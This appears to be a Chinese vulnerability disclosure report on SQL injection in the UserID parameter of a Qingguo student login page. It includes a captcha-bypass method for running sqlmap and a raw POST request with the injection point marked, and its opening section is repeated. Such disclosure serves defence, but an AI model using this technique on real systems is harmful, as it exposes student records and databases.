### 简要描述: 这么严重的SQL注射;青果会来确认吗? ### 详细说明: 青果某系统存在无限制SQL注射;居然没有见到传说中的WAF拦截;并且大部分可以使用SQLMAP自动化注入测试工具进行测试;并且均为DBA权限;危害极大! SQL Injection: ``` /_data/index_LOGIN.aspx 学生登录时UserID参数存在SQL注射漏洞 ``` Case: 99%以上都是存在该漏洞;我想我该Mask一下保护这些学生!审核员你说呢? ``` 手工 1、 ``` [<img src="https://images.seebug.org/upload/201507/08200559d3c5396677ca0a9a763e3ab04cf02c64.png" alt="01.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/08200559d3c5396677ca0a9a763e3ab04cf02c64.png) ``` ``` [<img src="https://images.seebug.org/upload/201507/0819505950e6c774026d7655ba61e2192dadb2d9.png" alt="07.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0819505950e6c774026d7655ba61e2192dadb2d9.png) ``` 2、SQLMAP自动化测试;使用SQLMAP自动化测试的方法就在于验证码会随机变换;经过测试在抓包获取POST提交数据后将CheckCode改为下一个验证码;注射参数后面*号标志即可绕过无限制SQL注射! POST /xsweb/_data/index_LOGIN.aspx HTTP/1.1 Host: ***.**.***.** Proxy-Connection: keep-alive Content-Length: 141 Cache-Control: max-age=0 Accept:...
### 简要描述: 这么严重的SQL注射;青果会来确认吗? ### 详细说明: 青果某系统存在无限制SQL注射;居然没有见到传说中的WAF拦截;并且大部分可以使用SQLMAP自动化注入测试工具进行测试;并且均为DBA权限;危害极大! SQL Injection: ``` /_data/index_LOGIN.aspx 学生登录时UserID参数存在SQL注射漏洞 ``` Case: 99%以上都是存在该漏洞;我想我该Mask一下保护这些学生!审核员你说呢? ``` 手工 1、 ``` [<img src="https://images.seebug.org/upload/201507/08200559d3c5396677ca0a9a763e3ab04cf02c64.png" alt="01.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/08200559d3c5396677ca0a9a763e3ab04cf02c64.png) ``` ``` [<img src="https://images.seebug.org/upload/201507/0819505950e6c774026d7655ba61e2192dadb2d9.png" alt="07.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0819505950e6c774026d7655ba61e2192dadb2d9.png) ``` 2、SQLMAP自动化测试;使用SQLMAP自动化测试的方法就在于验证码会随机变换;经过测试在抓包获取POST提交数据后将CheckCode改为下一个验证码;注射参数后面*号标志即可绕过无限制SQL注射! POST /xsweb/_data/index_LOGIN.aspx HTTP/1.1 Host: ***.**.***.** Proxy-Connection: keep-alive Content-Length: 141 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://***.**.***.* User-Agent: ********************** Content-Type: application/x-www-form-urlencoded Referer: http://***.**.***.*/xsweb/_data/index_LOGIN.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: ASP.NET_SessionId=rvmviarpqq0i3b3eemf5xmae __VIEWSTATE=dDwtMTc5NzIxMDUzMDs7PlnVMA1CpUQ5r4Nrg5HDOU7eG%2BMh&pcInfo=&typeName=&Sel_Type=STU&UserID=aaa*&PassWord=aaaaa&random=新的验证码&sbtState= ``` [<img src="https://images.seebug.org/upload/201507/08200245614d43beae6bc7630d13ed3d7a1e77cc.png" alt="08.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/08200245614d43beae6bc7630d13ed3d7a1e77cc.png) ``` ``` [<img src="https://images.seebug.org/upload/201507/082002514014f415ab94bf2342fcf150412a0924.png" alt="09.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/082002514014f415ab94bf2342fcf150412a0924.png) ``` ``` [<img src="https://images.seebug.org/upload/201507/082004221a53a9f6b6be686fc12c684b8f7b0225.png" alt="10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/082004221a53a9f6b6be686fc12c684b8f7b0225.png) ``` ```